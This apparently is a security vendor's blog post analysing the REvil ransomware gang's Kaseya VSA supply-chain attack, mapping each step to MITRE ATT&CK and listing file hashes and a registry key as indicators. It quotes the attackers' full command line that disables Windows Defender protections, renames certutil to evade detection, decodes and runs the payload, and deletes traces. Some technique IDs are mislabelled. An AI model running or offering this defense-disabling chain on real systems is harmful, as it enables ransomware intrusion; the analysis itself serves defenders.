TTPs Used by REvil (Sodinokibi) Ransomware Gang in Kaseya MSP Supply-Chain Attack

Keep up to date with latest blog posts

Kaseya MSP Supply-Chain Attack

Picus Labs has updated the Picus Threat Library with REvil (Sodinokibi) ransomware samples that are used in a massive cyberattack that targets multiple Managed Service Providers (MSPs) and thousands of their customers.

As with all recent large-scale cyberattacks, this attack is also a supply chain attack. REvil ransomware gang targeted MSPs and their customers through Kaseya VSA cloud-based MSP platform enabling service providers to perform patch management and client monitoring.

Attack Life-Cycle and Tactics, Techniques and Procedures (TTPs)

  • The Initial Access techniques is MITRE ATT&CK T1059.002 Supply Chain Compromise.

  • Kaseya VSA platform drops a base64 encoded file (agent.crt) to the C:\kworking folder, which will be delivered as part of the 'Kaseya VSA Agent Hot-fix' update.

  • After that, the following PowerShell command is launched by the C:\Program Files (x86)\Kaseya\<ID>\AgentMon.exe file of the Kaseya VSA platform. The REvil threat actors use PowerShell as the execution technique (MITRE ATT&CK T1059.001 Command and Scripting Interpreter: PowerShell).

    "C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe
  • This command first disables Real Time Protection feature of the Windows Defender:

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true
    This is a well-known "Impair Defenses" technique used by adversaries (MITRE ATT&CK T1562.001 Impair Defenses: Disable or Modify Tools).

  • Then, the PowerShell command disables some of the other features of the Windows Defender:

    • -DisableIOAVProtection $true : Disables the scanning of downloaded files and attachments.
    • -DisableScriptScanning $true : Disables the scanning of scripts during malware scans.
    • -EnableControlledFolderAccess Disabled : Disables the protection of valuable data from malicious apps and threats, such as ransomware. The "Controlled folder access" feature is included with Windows 10 and Windows Server 2019.
    • -EnableNetworkProtection AuditMode -Force : In this mode, it shows which IP addresses and domains would have been blocked, but it does not block those malicious IP addresses and domains.
    • -MAPSReporting Disabled : Disables Microsoft Active Protection Service (MAPS) membership.
    • -SubmitSamplesConsent NeverSend : Disables Windows Defender submits the samples

  • After impairing protection features of Windows Defender, the PowerShell command copies the certutil.exe utility to C:\Windows location as cert.exe. REvil ransomware gang uses the renamed cert.exe file from C:\Windows location, not the original certutil.exe file from C:\Windows\System32\ folder because they want to evade weak detection rules via masquearading (MITRE ATT&CK T1036 Masquerading ). Adversaries frequently utilize Windows system utilities in their operations to bypass defensive security controls. Rundll32.exe, cmd.exe, and certutil.exe are some of these utilities. Certutil.exe is a Windows binary used for handling certificates. However, adversaries use certutil.exe as a living off the land binary (LOLBin) for malicious purposes. Because of the increased use of legitimate system utilities by adversaries, security tools may monitor them to detect their suspicious use. To avoid name-based detection, adversaries rename system utilities.

    copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe

  • Then, the PowerShell command adds random characters to the end of the cert.exe to evade defenses use hash-based rules:

    echo %RANDOM% >> C:\Windows\cert.exe

  • After that, the command decodes the base64 encoded agent.crt file and save as agent.exe (MITRE ATT&CK T1140 Deobfuscate/Decode Files or Information):

    C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe
  • Then, the PowerShell command used by the Revil ransomware threat actors remove the agent.crt and cert.exe files to delete generated artifacts on the victim system (MITRE ATT&CK T1070 Indicator Removal on Host):

    del /q /f c:\kworking\agent.crt C:\Windows\cert.exe
  • Finally, the PowerShell command executes the agent.exe file, which is digitally signed using a valid certificate from "PB03 TRANSPORT LTD" (MITRE ATT&CK T1553.002 Subvert Trust Controls: Code Signing):

    c:\kworking\agent.exe

  • The agent.exe includes two embedded files, MsMpEng.exe and mpsvc.dll. When the agent.exe is executed, it extracts these files to the C:\Windows folder.

  • The MsMpEng.exe  file is an older version of the legitimate Microsoft Defender executable. Why would attackers want to download a version of Windows defender to a computer? Actually, the answer is straightforward, MsMpEng.exe is another LOLBin. Adversaries use MsMpEng.exe to launch the mpsvc.dll file with DLL side-loading and encrypt the device through this trusted Windows executable.
     
  • mpsvc.dll is the DLL used by the REvil as the encryptor payload (MITRE ATT&CK T1486 Data Encrypted for Impact). In addition to encryption, this Revil / Sodinokibi DLL creates the registry key HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\BlackLivesMatter to store several store encryptor runtime keys and configurations artifacts (MITRE ATT&CK T112 Modify Registry).

Attack Simulation

You can test your security controls against this vulnerability using the Picus Security Control Validation Platform. Picus Threat Library includes the following threats for Revil (Sodinokibi) ransomware samples used in the Kaseya MSP supply-chain attack. In addition to these new samples, Picus Threat Library includes 19 Revil (Sodinokibi) ransomware variants used in previous attack campaigns. As of July 4, 2021, Picus includes 1176 ransomware threat samples for 179 malware families, including DarkRadiation, Darkside, Clop, Crysis, RagnarLocker, WastedLocker, NetWalker, and RYUK. 

Picus ID

Threat Name

553850

REvil (Sodinokibi) Ransomware in Kaseya VSA MSP Supply Chain Attack .EXE File Download

219525

REvil (Sodinokibi) Ransomware in Kaseya VSA MSP Supply Chain Attack .DLL File Download Variant-1

843693

REvil (Sodinokibi) Ransomware in Kaseya VSA MSP Supply Chain Attack .DLL File Download Variant-2

Kaseya's Recommendations

  • Kaseya issued a new update, advising on-premise Kaseya partners to keep their VSA servers offline until further instructions on when it is safe to resume operations.

  • Kaseya also stated that SaaS and Hosted VSA Servers will be operational once they have determined that they can safely restore operations.

Employed MITRE ATT&CK Tactics and Techniques

  • Initial Access
    • T1059.002 Supply Chain Compromise: Compromise Software Supply Chain

  • Execution
    • T1059.001 Command and Scripting Interpreter: PowerShell

  • Persistence
    • T1574.002 Hijack Execution Flow: DLL Side-Loading

  • Privilege Escalation
    • T1574.002 Hijack Execution Flow: DLL Side-Loading

  • Defense Evasion
    • T1036.003 Masquerading: Rename System Utilities
    • T1562.001 Impair Defenses: Disable or Modify Tools
    • T1140 Deobfuscate/Decode Files or Information
    • T1574.002 Hijack Execution Flow: DLL Side-Loading
    • T1070.004 Indicator Removal on Host: File Deletion
    • T112 Modify Registry
    • T1553.002 Subvert Trust Controls: Code Signing

  • Impact
    • T1486 Data Encrypted for Impact

Indicators of Compromise (IOCs)

Files
 

  • C:\kworking\agent.exe (REvil Dropper)

    • SHA-256: d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e
    • SHA-1: 5162f14d75e96edb914d1756349d6e11583db0b0
    • MD5: 561cffbaba71a6e8cc1cdceda990ead4

    • SHA-256:df2d6ef0450660aaae62c429610b964949812df2da1c57646fc29aa51c3f031e
    • SHA-1:682389250d914b95d6c23ab29dffee11cb65cae9
    • MD5:0299e3c2536543885860c7b61e1efc3f

    • SHA-256: dc6b0e8c1e9c113f0364e1c8370060dee3fcbe25b667ddeca7623a95cd21411f
    • SHA-1: 8118474606a68c03581eef85a05a90275aa1ec24
    • MD5: 835f242dde220cc76ee5544119562268
    • SHA-256: d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e
    • SHA-1: 5162f14d75e96edb914d1756349d6e11583db0b0
    • MD5: 561cffbaba71a6e8cc1cdceda990ead4

    • SHA-256: 66490c59cb9630b53fa3fa7125b5c9511afde38edab4459065938c1974229ca8
    • SHA-1: 20e3a0955baca4dc7f1f36d3b865e632474add77
    • MD5: 5a97a50e45e64db41049fd88a75f2dd2

    • SHA-256: 81d0c71f8b282076cd93fb6bb5bfd3932422d033109e2c92572fc49e4abc2471
    • SHA-1:13d57aba8df4c95185c1a6d2f945d65795ee825b
    • MD5:be6c46239e9c753de227bf1f3428e271

    • SHA-256: 1fe9b489c25bb23b04d9996e8107671edee69bd6f6def2fe7ece38a0fb35f98e
    • SHA-1: 3c2b0dcdb2a46fc1ec0a12a54309e35621caa925
    • MD5 :18786bfac1be0ddf23ff94c029ca4d63
  • C:\Windows\mpsvc.dll (REvil / Sodinokibi DLL)

    • SHA-256: 8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd
    • SHA-1: 656c4d285ea518d90c1b669b79af475db31e30b1
    • MD5: a47cf00aedf769d60d58bfe00c0b5421

    • SHA-256:e2a24ab94f865caeacdf2c3ad015f31f23008ac6db8312c2cbfb32e4a5466ea2
    • SHA-1: e1d689bf92ff338752b8ae5a2e8d75586ad2b67b
    • MD5: 7ea501911850a077cf0f9fe6a7518859
     
    • SHA-256: d8353cfc5e696d3ae402c7c70565c1e7f31e49bcf74a6e12e5ab044f306b4b20
    • SHA-1: 1bcf1ae39b898aaa8b6b0207d7e307b234614ff6
    • MD5: 849fb558745e4089a8232312594b21d2

    • SHA-256: d5ce6f36a06b0dc8ce8e7e2c9a53e66094c2adfc93cfac61dd09efe9ac45a75f
    • SHA-1: 7895e4d017c3ed5edb9bf92c156316b4990361eb
    • MD5: 4a91cb0705539e1d09108c60f991ffcf
    • SHA-256: cc0cdc6a3d843e22c98170713abf1d6ae06e8b5e34ed06ac3159adafe85e3bd6
    • SHA-1: 45c1b556f5a875b71f2286e1ed4c7bd32e705758
    • MD5: 7d1807850275485397ce2bb218eff159

    • SHA-256: 0496ca57e387b10dfdac809de8a4e039f68e8d66535d5d19ec76d39f7d0a4402
    • SHA-1: c0f569fc22cb5dd8e02e44f85168b4b72a6669c3
    • MD5: 040818b1b3c9b1bf8245f5bcb4eebbbc
    • SHA-256: 8e846ed965bbc0270a6f58c5818e039ef2fb78def4d2bf82348ca786ea0cea4f
    • SHA-1: c2bb3eef783c18d9825134dc8b6e9cc261d4cca7
    • MD5: a560890b8af60b9824c73be74ef24a46
  • C:\Windows\cert.exe

    • SHA256: 36a71c6ac77db619e18f701be47d79306459ff1550b0c92da47b8c46e2ec0752

    Note: Using this hash is ineffective since it is a random character added version of the certutil.exe file. You should use behavior-based detection, for example, renaming/copying certutil.exe.;

  • C:\windows\msmpeng.exe

    • SHA-256: 33bc14d231a4afaa18f06513766d5f69d8b88f1e697cd127d24fb4b72ad44c7a
    • SHA-1: 3d409b39b8502fcd23335a878f2cbdaf6d721995
    • MD5: 8cc83221870dd07144e63df594c391d9

      Note: This file is an older version of Windows Defender. It is a legitimate binary, but it is used for malicious purposes by adversaries like other living off the land tools.
  • C:\Program Files (x86)\Kaseya\<ID>\AgentMon.exe (Legitimate Kaseya VSA binary used for remote execution)

Domains

YARA Rules

Registry Keys

  • HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\BlackLivesMatter

Subscribe

Keep up to date with latest blog posts